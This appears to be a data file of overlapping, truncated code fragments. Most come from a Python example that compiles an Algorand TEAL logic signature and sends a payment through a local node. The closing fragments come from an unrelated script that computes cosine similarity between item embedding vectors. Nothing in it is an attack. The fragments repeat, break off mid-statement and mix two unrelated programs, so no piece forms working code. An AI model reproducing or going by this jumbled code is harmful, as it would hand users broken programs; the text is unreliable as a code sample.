btoi # int 123 # == #", "algod_client.suggested_params() # Comment out the next two (2) lines to use suggested fees", "// samplearg.teal # arg_0 # btoi # int 123 # == # //", "= programstr.encode() program = base64.decodebytes(t) print(program) # string parameter # arg_str = \"<my", "\"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL program data", "response['result']) print(\"Response Hash = \", response['hash']) # Create logic sig programstr = response['result']", "txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid) except Exception as", "amount, closeremainderto) # Create the LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn,", "next two (2) lines to use suggested fees params.flat_fee = True params.fee =", "// bto1 # // Opcode: 0x17 # // Pops: ... stack, []byte #", "params, receiver, amount, closeremainderto) # Create the LogicSigTransaction with contract account LogicSig lstx", "panics if the input is longer than 8 bytes response = algod_client.compile(data) #", "Result = \", response['result']) print(\"Response Hash = \", response['hash']) # Create logic sig", "TEAL program data = open(myprogram, 'r').read() # Compile TEAL program # // This", "is confirmed before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not", "raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client,", "def wait_for_confirmation(client, txid): \"\"\" Utility function to wait until the transaction is confirmed", "Create the LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx],", "myprogram = \"samplearg.teal\" # Read TEAL program data = open(myprogram, 'r').read() # Compile", "= response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program) # string parameter #", "# arg_0 # btoi # int 123 # == # // bto1 #", "# // btoi panics if the input is longer than 8 bytes response", "= (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested", "until the transaction is confirmed before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo =", "X as big endian to uint64 # // btoi panics if the input", "not, omit args param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender", "Create arg to pass if TEAL program requires an arg # if not,", "wait until the transaction is confirmed before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo", "= LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network txid", "== # // bto1 # // Opcode: 0x17 # // Pops: ... stack,", "LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to", "algod from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\"", "as big endian to uint64 # // btoi panics if the input is", "transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass", "args=[arg1]) sender = lsig.address() # Get suggested parameters params = algod_client.suggested_params() # Comment", "open(myprogram, 'r').read() # Compile TEAL program # // This code is meant for", "[]byte # // Pushes: uint64 # // converts bytes X as big endian", "\"<my string>\" # arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see", "return txinfo try: # Create an algod client algod_token = \"<KEY>\" algod_address =", "'r').read() # Compile TEAL program # // This code is meant for learning", "= client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round", "None # Create a transaction txn = PaymentTxn( sender, params, receiver, amount, closeremainderto)", "from algosdk.v2client import algod from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def", "closeremainderto = None # Create a transaction txn = PaymentTxn( sender, params, receiver,", "data = open(myprogram, 'r').read() # Compile TEAL program # // This code is", "two (2) lines to use suggested fees params.flat_fee = True params.fee = 1000", "an arg # if not, omit args param arg1 = (123).to_bytes(8, 'big') lsig", "(txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo", "algod_address) myprogram = \"samplearg.teal\" # Read TEAL program data = open(myprogram, 'r').read() #", "+= 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid,", "algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL program data = open(myprogram, 'r').read()", "Compile TEAL program # // This code is meant for learning purposes only", "params.fee = 1000 # Build transaction amount = 10000 closeremainderto = None #", "0x17 # // Pops: ... stack, []byte # // Pushes: uint64 # //", "the transaction is confirmed before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid)", "arg_0 # btoi # int 123 # == # // bto1 # //", "the next two (2) lines to use suggested fees params.flat_fee = True params.fee", "fees params.flat_fee = True params.fee = 1000 # Build transaction amount = 10000", "> 0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction", "meant for learning purposes only # // It should not be used in", "not be used in production # // samplearg.teal # arg_0 # btoi #", "# Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" +", "arg_str = \"<my string>\" # arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1])", "= algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL program data = open(myprogram,", "from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility", "in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an algod client", "code is meant for learning purposes only # // It should not be", "before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and", "sender, params, receiver, amount, closeremainderto) # Create the LogicSigTransaction with contract account LogicSig", "// This code is meant for learning purposes only # // It should", "# Get suggested parameters params = algod_client.suggested_params() # Comment out the next two", "string parameter # arg_str = \"<my string>\" # arg1 = arg_str.encode() # lsig", "the input is longer than 8 bytes response = algod_client.compile(data) # Print(response) print(\"Response", "# // It should not be used in production # // samplearg.teal #", "txid): \"\"\" Utility function to wait until the transaction is confirmed before proceeding.", "# // Opcode: 0x17 # // Pops: ... stack, []byte # // Pushes:", "# Create logic sig programstr = response['result'] t = programstr.encode() program = base64.decodebytes(t)", "# // bto1 # // Opcode: 0x17 # // Pops: ... stack, []byte", "algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client =", "// Pops: ... stack, []byte # // Pushes: uint64 # // converts bytes", "bto1 # // Opcode: 0x17 # // Pops: ... stack, []byte # //", "confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an algod", "algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL program data =", "Create a transaction txn = PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create", "program data = open(myprogram, 'r').read() # Compile TEAL program # // This code", "logic sig programstr = response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program) #", "lines to use suggested fees params.flat_fee = True params.fee = 1000 # Build", "out the next two (2) lines to use suggested fees params.flat_fee = True", "more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL program requires", "algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address)", "should not be used in production # // samplearg.teal # arg_0 # btoi", "try: # Create an algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver", "btoi panics if the input is longer than 8 bytes response = algod_client.compile(data)", "here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL program requires an arg", "# if not, omit args param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program,", "Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash = \", response['hash']) # Create", "= \", response['result']) print(\"Response Hash = \", response['hash']) # Create logic sig programstr", "purposes only # // It should not be used in production # //", "parameter # arg_str = \"<my string>\" # arg1 = arg_str.encode() # lsig =", "# // converts bytes X as big endian to uint64 # // btoi", "txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an algod client algod_token = \"<KEY>\"", "contract account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw", "round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an algod client algod_token", "txinfo.get('confirmed-round'))) return txinfo try: # Create an algod client algod_token = \"<KEY>\" algod_address", "= \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL program", "algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\"", "sig programstr = response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program) # string", "\"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read", "args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if", "transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID:", "the LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\")", "lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network", "requires an arg # if not, omit args param arg1 = (123).to_bytes(8, 'big')", "program # // This code is meant for learning purposes only # //", "Comment out the next two (2) lines to use suggested fees params.flat_fee =", "1000 # Build transaction amount = 10000 closeremainderto = None # Create a", "only # // It should not be used in production # // samplearg.teal", "# transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction", "t = programstr.encode() program = base64.decodebytes(t) print(program) # string parameter # arg_str =", "{} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an", "= \"<my string>\" # arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) #", "1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round')))", "response = algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash =", "bytes X as big endian to uint64 # // btoi panics if the", "if the input is longer than 8 bytes response = algod_client.compile(data) # Print(response)", "# Create an algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver =", "'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested parameters params", "arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see more info here:", "PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create the LogicSigTransaction with contract account", "txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo", "import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to", "# == # // bto1 # // Opcode: 0x17 # // Pops: ...", "if not, omit args param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1])", "param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address() #", "txinfo try: # Create an algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\"", "# // This code is meant for learning purposes only # // It", "{}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an algod client algod_token =", "a transaction txn = PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create the", "client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for", "Create logic sig programstr = response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program)", "123 # == # // bto1 # // Opcode: 0x17 # // Pops:", "info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL program requires an", "txn = PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create the LogicSigTransaction with", "input is longer than 8 bytes response = algod_client.compile(data) # Print(response) print(\"Response Result", "\"samplearg.teal\" # Read TEAL program data = open(myprogram, 'r').read() # Compile TEAL program", "Utility function to wait until the transaction is confirmed before proceeding. \"\"\" last_round", "\"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram =", "for learning purposes only # // It should not be used in production", "transaction txn = PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create the LogicSigTransaction", "https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL program requires an arg #", "\", response['result']) print(\"Response Hash = \", response['hash']) # Create logic sig programstr =", "samplearg.teal # arg_0 # btoi # int 123 # == # // bto1", "# Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash = \", response['hash']) #", "bytes response = algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash", "function to wait until the transaction is confirmed before proceeding. \"\"\" last_round =", "txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid)", "suggested fees params.flat_fee = True params.fee = 1000 # Build transaction amount =", "= True params.fee = 1000 # Build transaction amount = 10000 closeremainderto =", "# Create the LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn, lsig) #", "to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid) except", "algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function", "used in production # // samplearg.teal # arg_0 # btoi # int 123", "client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token,", "# // Pops: ... stack, []byte # // Pushes: uint64 # // converts", "= transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to", "arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks #", "= None # Create a transaction txn = PaymentTxn( sender, params, receiver, amount,", "response['hash']) # Create logic sig programstr = response['result'] t = programstr.encode() program =", "= client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try:", "int 123 # == # // bto1 # // Opcode: 0x17 # //", "response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program) # string parameter # arg_str", "TEAL program # // This code is meant for learning purposes only #", "lsig.address() # Get suggested parameters params = algod_client.suggested_params() # Comment out the next", "closeremainderto) # Create the LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn, lsig)", "LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to wait until the", "// It should not be used in production # // samplearg.teal # arg_0", "print(\"Response Result = \", response['result']) print(\"Response Hash = \", response['hash']) # Create logic", "// Opcode: 0x17 # // Pops: ... stack, []byte # // Pushes: uint64", "endian to uint64 # // btoi panics if the input is longer than", "= base64.decodebytes(t) print(program) # string parameter # arg_str = \"<my string>\" # arg1", "= \"samplearg.teal\" # Read TEAL program data = open(myprogram, 'r').read() # Compile TEAL", "# string parameter # arg_str = \"<my string>\" # arg1 = arg_str.encode() #", "Get suggested parameters params = algod_client.suggested_params() # Comment out the next two (2)" ]
[ "np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec) if fenmu == 0: score[tmp_itemid] = 0 else: score[tmp_itemid] =", "def cal_item_sim(item_vec, itemid, output_file): \"\"\" Args item_vec:item embedding vector itemid:fixed itemid to clac", "== \"</s>\": continue item_vec[itemid] = np.array([float(ele) for ele in item[1:]]) fp.close() return item_vec", "the file to store result \"\"\" if itemid not in item_vec: return score", "continue itemid = item[0] if itemid == \"</s>\": continue item_vec[itemid] = np.array([float(ele) for", "item_vec: if tmp_itemid == itemid: continue tmp_itemvec = item_vec[tmp_itemid] fenmu = np.linalg.norm(fix_item_vec) *", "dict key:itemid value:np.array([num1, num2....]) \"\"\" if not os.path.exists(input_file): return {} linenum = 0", "np.linalg.norm(tmp_itemvec) if fenmu == 0: score[tmp_itemid] = 0 else: score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu,", "key = operator.itemgetter(1), reverse = True)[:topk]: tmp_list.append(zuhe[0] + \"_\" + str(zuhe[1])) out_str +=", "if linenum == 0: linenum += 1 continue item = line.strip().split() if len(item)", "numpy as np import operator import sys def load_item_vec(input_file): \"\"\" Args: input_file: item", "<reponame>whz-NJ/PersonalRecommendation #-*-coding:utf8-*- \"\"\" author:zhiyuan date:2019 produce item sim file \"\"\" import os import", "reverse = True)[:topk]: tmp_list.append(zuhe[0] + \"_\" + str(zuhe[1])) out_str += \";\".join(tmp_list) fw.write(out_str +", "== 0: linenum += 1 continue item = line.strip().split() if len(item) < 129:", "in item[1:]]) fp.close() return item_vec def cal_item_sim(item_vec, itemid, output_file): \"\"\" Args item_vec:item embedding", "= operator.itemgetter(1), reverse = True)[:topk]: tmp_list.append(zuhe[0] + \"_\" + str(zuhe[1])) out_str += \";\".join(tmp_list)", "3) fw = open(output_file, \"w+\") out_str = itemid + \"\\t\" tmp_list = []", "date:2019 produce item sim file \"\"\" import os import numpy as np import", "file Return: dict key:itemid value:np.array([num1, num2....]) \"\"\" if not os.path.exists(input_file): return {} linenum", "file \"\"\" import os import numpy as np import operator import sys def", "input_file: item vec file Return: dict key:itemid value:np.array([num1, num2....]) \"\"\" if not os.path.exists(input_file):", "item_vec = {} fp = open(input_file) for line in fp: if linenum ==", "score = {} topk = 10 fix_item_vec = item_vec[itemid] for tmp_itemid in item_vec:", "0 else: score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3) fw = open(output_file, \"w+\") out_str =", "1 continue item = line.strip().split() if len(item) < 129: continue itemid = item[0]", "if fenmu == 0: score[tmp_itemid] = 0 else: score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3)", "if itemid == \"</s>\": continue item_vec[itemid] = np.array([float(ele) for ele in item[1:]]) fp.close()", "ele in item[1:]]) fp.close() return item_vec def cal_item_sim(item_vec, itemid, output_file): \"\"\" Args item_vec:item", "tmp_itemid == itemid: continue tmp_itemvec = item_vec[tmp_itemid] fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec) if", "vec file Return: dict key:itemid value:np.array([num1, num2....]) \"\"\" if not os.path.exists(input_file): return {}", "item[0] if itemid == \"</s>\": continue item_vec[itemid] = np.array([float(ele) for ele in item[1:]])", "vector itemid:fixed itemid to clac item sim output_file: the file to store result", "topk = 10 fix_item_vec = item_vec[itemid] for tmp_itemid in item_vec: if tmp_itemid ==", "Args item_vec:item embedding vector itemid:fixed itemid to clac item sim output_file: the file", "{} fp = open(input_file) for line in fp: if linenum == 0: linenum", "return {} linenum = 0 item_vec = {} fp = open(input_file) for line", "== 0: score[tmp_itemid] = 0 else: score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3) fw =", "score[tmp_itemid] = 0 else: score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3) fw = open(output_file, \"w+\")", "linenum == 0: linenum += 1 continue item = line.strip().split() if len(item) <", "fp: if linenum == 0: linenum += 1 continue item = line.strip().split() if", "continue tmp_itemvec = item_vec[tmp_itemid] fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec) if fenmu == 0:", "key:itemid value:np.array([num1, num2....]) \"\"\" if not os.path.exists(input_file): return {} linenum = 0 item_vec", "else: score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3) fw = open(output_file, \"w+\") out_str = itemid", "itemid + \"\\t\" tmp_list = [] for zuhe in sorted(score.iteritems(), key = operator.itemgetter(1),", "\"w+\") out_str = itemid + \"\\t\" tmp_list = [] for zuhe in sorted(score.iteritems(),", "inputfile outputfile\") sys.exit() else: inputfile = sys.argv[1] outputfile = sys.argv[2] run_main(inputfile, outputfile) #run_main(\"../data/item_vec.txt\",", "item_vec = load_item_vec(input_file) cal_item_sim(item_vec, \"27\", output_file) if __name__ == \"__main__\": if len(sys.argv) <", "Args: input_file: item vec file Return: dict key:itemid value:np.array([num1, num2....]) \"\"\" if not", "itemid, output_file): \"\"\" Args item_vec:item embedding vector itemid:fixed itemid to clac item sim", "zuhe in sorted(score.iteritems(), key = operator.itemgetter(1), reverse = True)[:topk]: tmp_list.append(zuhe[0] + \"_\" +", "return item_vec def cal_item_sim(item_vec, itemid, output_file): \"\"\" Args item_vec:item embedding vector itemid:fixed itemid", "in item_vec: if tmp_itemid == itemid: continue tmp_itemvec = item_vec[tmp_itemid] fenmu = np.linalg.norm(fix_item_vec)", "open(input_file) for line in fp: if linenum == 0: linenum += 1 continue", "as np import operator import sys def load_item_vec(input_file): \"\"\" Args: input_file: item vec", "itemid not in item_vec: return score = {} topk = 10 fix_item_vec =", "score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3) fw = open(output_file, \"w+\") out_str = itemid +", "+= \";\".join(tmp_list) fw.write(out_str + \"\\n\") fw.close() def run_main(input_file, output_file): item_vec = load_item_vec(input_file) cal_item_sim(item_vec,", "* np.linalg.norm(tmp_itemvec) if fenmu == 0: score[tmp_itemid] = 0 else: score[tmp_itemid] = round(np.dot(fix_item_vec,", "python xx.py inputfile outputfile\") sys.exit() else: inputfile = sys.argv[1] outputfile = sys.argv[2] run_main(inputfile,", "fp = open(input_file) for line in fp: if linenum == 0: linenum +=", "{} linenum = 0 item_vec = {} fp = open(input_file) for line in", "print (\"usage: python xx.py inputfile outputfile\") sys.exit() else: inputfile = sys.argv[1] outputfile =", "out_str += \";\".join(tmp_list) fw.write(out_str + \"\\n\") fw.close() def run_main(input_file, output_file): item_vec = load_item_vec(input_file)", "np import operator import sys def load_item_vec(input_file): \"\"\" Args: input_file: item vec file", "embedding vector itemid:fixed itemid to clac item sim output_file: the file to store", "file to store result \"\"\" if itemid not in item_vec: return score =", "= 10 fix_item_vec = item_vec[itemid] for tmp_itemid in item_vec: if tmp_itemid == itemid:", "10 fix_item_vec = item_vec[itemid] for tmp_itemid in item_vec: if tmp_itemid == itemid: continue", "return score = {} topk = 10 fix_item_vec = item_vec[itemid] for tmp_itemid in", "value:np.array([num1, num2....]) \"\"\" if not os.path.exists(input_file): return {} linenum = 0 item_vec =", "= item[0] if itemid == \"</s>\": continue item_vec[itemid] = np.array([float(ele) for ele in", "item sim output_file: the file to store result \"\"\" if itemid not in", "itemid = item[0] if itemid == \"</s>\": continue item_vec[itemid] = np.array([float(ele) for ele", "+ str(zuhe[1])) out_str += \";\".join(tmp_list) fw.write(out_str + \"\\n\") fw.close() def run_main(input_file, output_file): item_vec", "np.array([float(ele) for ele in item[1:]]) fp.close() return item_vec def cal_item_sim(item_vec, itemid, output_file): \"\"\"", "fw.close() def run_main(input_file, output_file): item_vec = load_item_vec(input_file) cal_item_sim(item_vec, \"27\", output_file) if __name__ ==", "str(zuhe[1])) out_str += \";\".join(tmp_list) fw.write(out_str + \"\\n\") fw.close() def run_main(input_file, output_file): item_vec =", "operator.itemgetter(1), reverse = True)[:topk]: tmp_list.append(zuhe[0] + \"_\" + str(zuhe[1])) out_str += \";\".join(tmp_list) fw.write(out_str", "len(item) < 129: continue itemid = item[0] if itemid == \"</s>\": continue item_vec[itemid]", "fix_item_vec = item_vec[itemid] for tmp_itemid in item_vec: if tmp_itemid == itemid: continue tmp_itemvec", "clac item sim output_file: the file to store result \"\"\" if itemid not", "= True)[:topk]: tmp_list.append(zuhe[0] + \"_\" + str(zuhe[1])) out_str += \";\".join(tmp_list) fw.write(out_str + \"\\n\")", "fw.write(out_str + \"\\n\") fw.close() def run_main(input_file, output_file): item_vec = load_item_vec(input_file) cal_item_sim(item_vec, \"27\", output_file)", "sim output_file: the file to store result \"\"\" if itemid not in item_vec:", "import os import numpy as np import operator import sys def load_item_vec(input_file): \"\"\"", "+= 1 continue item = line.strip().split() if len(item) < 129: continue itemid =", "fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec) if fenmu == 0: score[tmp_itemid] = 0 else:", "def run_main(input_file, output_file): item_vec = load_item_vec(input_file) cal_item_sim(item_vec, \"27\", output_file) if __name__ == \"__main__\":", "\"__main__\": if len(sys.argv) < 3: print (\"usage: python xx.py inputfile outputfile\") sys.exit() else:", "\"_\" + str(zuhe[1])) out_str += \";\".join(tmp_list) fw.write(out_str + \"\\n\") fw.close() def run_main(input_file, output_file):", "round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3) fw = open(output_file, \"w+\") out_str = itemid + \"\\t\" tmp_list", "linenum += 1 continue item = line.strip().split() if len(item) < 129: continue itemid", "129: continue itemid = item[0] if itemid == \"</s>\": continue item_vec[itemid] = np.array([float(ele)", "== \"__main__\": if len(sys.argv) < 3: print (\"usage: python xx.py inputfile outputfile\") sys.exit()", "load_item_vec(input_file): \"\"\" Args: input_file: item vec file Return: dict key:itemid value:np.array([num1, num2....]) \"\"\"", "cal_item_sim(item_vec, itemid, output_file): \"\"\" Args item_vec:item embedding vector itemid:fixed itemid to clac item", "= [] for zuhe in sorted(score.iteritems(), key = operator.itemgetter(1), reverse = True)[:topk]: tmp_list.append(zuhe[0]", "tmp_list = [] for zuhe in sorted(score.iteritems(), key = operator.itemgetter(1), reverse = True)[:topk]:", "\"\"\" import os import numpy as np import operator import sys def load_item_vec(input_file):", "import operator import sys def load_item_vec(input_file): \"\"\" Args: input_file: item vec file Return:", "= item_vec[tmp_itemid] fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec) if fenmu == 0: score[tmp_itemid] =", "line in fp: if linenum == 0: linenum += 1 continue item =", "item_vec:item embedding vector itemid:fixed itemid to clac item sim output_file: the file to", "output_file): item_vec = load_item_vec(input_file) cal_item_sim(item_vec, \"27\", output_file) if __name__ == \"__main__\": if len(sys.argv)", "\"\"\" author:zhiyuan date:2019 produce item sim file \"\"\" import os import numpy as", "item = line.strip().split() if len(item) < 129: continue itemid = item[0] if itemid", "< 3: print (\"usage: python xx.py inputfile outputfile\") sys.exit() else: inputfile = sys.argv[1]", "operator import sys def load_item_vec(input_file): \"\"\" Args: input_file: item vec file Return: dict", "line.strip().split() if len(item) < 129: continue itemid = item[0] if itemid == \"</s>\":", "os.path.exists(input_file): return {} linenum = 0 item_vec = {} fp = open(input_file) for", "author:zhiyuan date:2019 produce item sim file \"\"\" import os import numpy as np", "0 item_vec = {} fp = open(input_file) for line in fp: if linenum", "True)[:topk]: tmp_list.append(zuhe[0] + \"_\" + str(zuhe[1])) out_str += \";\".join(tmp_list) fw.write(out_str + \"\\n\") fw.close()", "= np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec) if fenmu == 0: score[tmp_itemid] = 0 else: score[tmp_itemid]", "out_str = itemid + \"\\t\" tmp_list = [] for zuhe in sorted(score.iteritems(), key", "= 0 item_vec = {} fp = open(input_file) for line in fp: if", "\"27\", output_file) if __name__ == \"__main__\": if len(sys.argv) < 3: print (\"usage: python", "tmp_itemvec)/fenmu, 3) fw = open(output_file, \"w+\") out_str = itemid + \"\\t\" tmp_list =", "__name__ == \"__main__\": if len(sys.argv) < 3: print (\"usage: python xx.py inputfile outputfile\")", "len(sys.argv) < 3: print (\"usage: python xx.py inputfile outputfile\") sys.exit() else: inputfile =", "+ \"\\t\" tmp_list = [] for zuhe in sorted(score.iteritems(), key = operator.itemgetter(1), reverse", "= round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3) fw = open(output_file, \"w+\") out_str = itemid + \"\\t\"", "if tmp_itemid == itemid: continue tmp_itemvec = item_vec[tmp_itemid] fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec)", "= item_vec[itemid] for tmp_itemid in item_vec: if tmp_itemid == itemid: continue tmp_itemvec =", "result \"\"\" if itemid not in item_vec: return score = {} topk =", "if len(item) < 129: continue itemid = item[0] if itemid == \"</s>\": continue", "itemid to clac item sim output_file: the file to store result \"\"\" if", "0: linenum += 1 continue item = line.strip().split() if len(item) < 129: continue", "outputfile\") sys.exit() else: inputfile = sys.argv[1] outputfile = sys.argv[2] run_main(inputfile, outputfile) #run_main(\"../data/item_vec.txt\", \"../data/sim_result.txt\")", "\"\"\" if itemid not in item_vec: return score = {} topk = 10", "+ \"\\n\") fw.close() def run_main(input_file, output_file): item_vec = load_item_vec(input_file) cal_item_sim(item_vec, \"27\", output_file) if", "cal_item_sim(item_vec, \"27\", output_file) if __name__ == \"__main__\": if len(sys.argv) < 3: print (\"usage:", "for tmp_itemid in item_vec: if tmp_itemid == itemid: continue tmp_itemvec = item_vec[tmp_itemid] fenmu", "to clac item sim output_file: the file to store result \"\"\" if itemid", "not in item_vec: return score = {} topk = 10 fix_item_vec = item_vec[itemid]", "= {} topk = 10 fix_item_vec = item_vec[itemid] for tmp_itemid in item_vec: if", "sys def load_item_vec(input_file): \"\"\" Args: input_file: item vec file Return: dict key:itemid value:np.array([num1,", "os import numpy as np import operator import sys def load_item_vec(input_file): \"\"\" Args:", "\"\"\" if not os.path.exists(input_file): return {} 